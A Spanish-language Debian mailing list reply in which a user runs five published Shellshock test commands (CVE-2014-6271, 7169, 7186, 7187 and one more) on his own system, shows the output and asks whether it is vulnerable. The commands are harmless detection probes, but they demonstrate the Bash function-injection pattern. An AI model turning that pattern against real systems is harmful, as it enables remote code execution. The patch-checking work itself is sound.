Re: Bash vulnerable

[Eduardo Rios]

El 28/09/14 a las 18:03, Fabián Bonetti escribió:

Esas no son las pruebas correctas.
Las correctas están aquí > https://shellshocker.net/

Vamos allá:

Exploit 1 (CVE-2014-6271)

edurios@debian:~$ env x='() { :;}; echo vulnerable' bash -c "echo this 
is a test"
this is a test
edurios@debian:~$

Exploit 2 (CVE-2014-7169)

edurios@debian:~$ env X='() { (shellshocker.net)=>\' bash -c "echo 
date"; cat echo ; rm -f echo
date
cat: echo: No existe el fichero o el directorio
edurios@debian:~$

Exploit 3 (???)

edurios@debian:~$ env -i X=' () { }; echo hello' bash -c 'date'
Sun Sep 28 18:50:44 CEST 2014
edurios@debian:~$

Exploit 4 (CVE-2014-7186)

edurios@debian:~$ bash -c 'true <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF 
<<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF' ||
> echo "CVE-2014-7186 vulnerable, redir_stack"
bash: aviso: el documento-aquí en la línea 0 está delimitado por 
fin-de-fichero (se esperaba `EOF')
bash: aviso: el documento-aquí en la línea 0 está delimitado por 
fin-de-fichero (se esperaba `EOF')
bash: aviso: el documento-aquí en la línea 0 está delimitado por 
fin-de-fichero (se esperaba `EOF')
bash: aviso: el documento-aquí en la línea 0 está delimitado por 
fin-de-fichero (se esperaba `EOF')
bash: aviso: el documento-aquí en la línea 0 está delimitado por 
fin-de-fichero (se esperaba `EOF')
bash: aviso: el documento-aquí en la línea 0 está delimitado por 
fin-de-fichero (se esperaba `EOF')
bash: aviso: el documento-aquí en la línea 0 está delimitado por 
fin-de-fichero (se esperaba `EOF')
bash: aviso: el documento-aquí en la línea 0 está delimitado por 
fin-de-fichero (se esperaba `EOF')
bash: aviso: el documento-aquí en la línea 0 está delimitado por 
fin-de-fichero (se esperaba `EOF')
bash: aviso: el documento-aquí en la línea 0 está delimitado por 
fin-de-fichero (se esperaba `EOF')
bash: aviso: el documento-aquí en la línea 0 está delimitado por 
fin-de-fichero (se esperaba `EOF')
bash: aviso: el documento-aquí en la línea 0 está delimitado por 
fin-de-fichero (se esperaba `EOF')
bash: aviso: el documento-aquí en la línea 0 está delimitado por 
fin-de-fichero (se esperaba `EOF')
bash: aviso: el documento-aquí en la línea 0 está delimitado por 
fin-de-fichero (se esperaba `EOF')
edurios@debian:~$


Exploit 5 (CVE-2014-7187)
edurios@debian:~$ (for x in {1..200} ; do echo "for x$x in ; do :"; 
done; for x in {1..200} ; do echo done ; done) | bash ||
> echo "CVE-2014-7187 vulnerable, word_lineno"
edurios@debian:~$


¿Es vulnerable a alguno de los 5 test?





--
www.LinuxCounter.net

Registered user #558467
has 2 linux machines


--
To UNSUBSCRIBE, email to debian-user-spanish-requ...@lists.debian.org
with a subject of "unsubscribe". Trouble? Contact listmas...@lists.debian.org
Archive: https://lists.debian.org/m09ei3$gff$1...@ger.gmane.org